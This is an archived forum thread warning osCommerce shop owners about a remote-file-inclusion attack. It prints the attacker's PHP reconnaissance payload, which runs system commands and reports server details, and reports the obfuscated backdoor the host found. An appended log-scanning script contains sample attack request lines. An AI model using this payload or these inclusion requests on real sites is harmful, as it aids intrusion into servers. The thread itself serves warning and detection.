Hackers Entry Point into Oscommerce


elton123


Hi

I've noticed some strange activity on my website. Under who's online I've noticed the following url:

http://***.100megsfree8.com/id.gif?

I've clicked on it and the following code was submitted:

<?php
function ConvertBytes($number)
{
    $len = strlen($number);
    if($len < 4)
    {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6)
    {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9)
    {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }

    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "CabaL<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "CabaL<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

 

I immediately banned all IPs originating from it which were active on my website.

I alerted my server host as well.

My host reported back that malicious code was found on my website which they removed.

/home/*******/public_html/admin/includes/configuration_cache.php: PHP.Obfus FOUND

I'm posting this info here as a warning to other users.

Kind Regards
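
For shop owners who want to check their own access logs for requests shaped like the one in the post above, here is an added detection example (not part of the original post, and not osCommerce code). It assumes the off-site URL arrived as a query-string value in a combined-format access log; the hosts `shop.example` and `files.example`, the parameter names `page` and `inc`, and the log lines are all constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: Apache/Nginx "combined" log format; only IP and request line are used.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://(?P<host>[^/?#:]+)', re.I)

def remote_url_params(uri, own_hosts):
    """Return (param, value) pairs whose value is a URL on a host we do not own."""
    hits = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        value = unquote(value).strip()  # second decode catches double-encoded values
        m = REMOTE_RE.match(value)
        if m and m.group("host").lower() not in own_hosts:
            hits.append((name, value))
    return hits

def scan(lines, own_hosts):
    """Flag log lines that pass an off-site URL as a parameter value."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        for name, value in remote_url_params(m.group("uri"), own_hosts):
            findings.append({
                "ip": m.group("ip"),
                "param": name,
                "url": value,
                # same shape as the URL in the post: value ends in "?"
                "trailing_q": value.endswith("?"),
            })
    return findings

# Constructed sample log lines (documentation IP ranges, hypothetical hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?cPath=21 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.23 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?page=http://files.example/id.gif? HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.23 - - [01/Jan/2010:10:00:09 +0000] "GET /product_info.php?products_id=3&inc=http%3A%2F%2Ffiles.example%2Fid.gif%3F HTTP/1.1" 200 640 "-" "-"',
    '203.0.113.9 - - [01/Jan/2010:10:01:00 +0000] "GET /redirect.php?goto=http://shop.example/specials.php HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, {"shop.example"}):
        print(f)
```

Any hit is a reason to look at what the named parameter does in the script that received it, and to compare the timestamps against recently modified files such as the one the host's scanner reported.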


Archived

This topic is now archived and is closed to further replies.
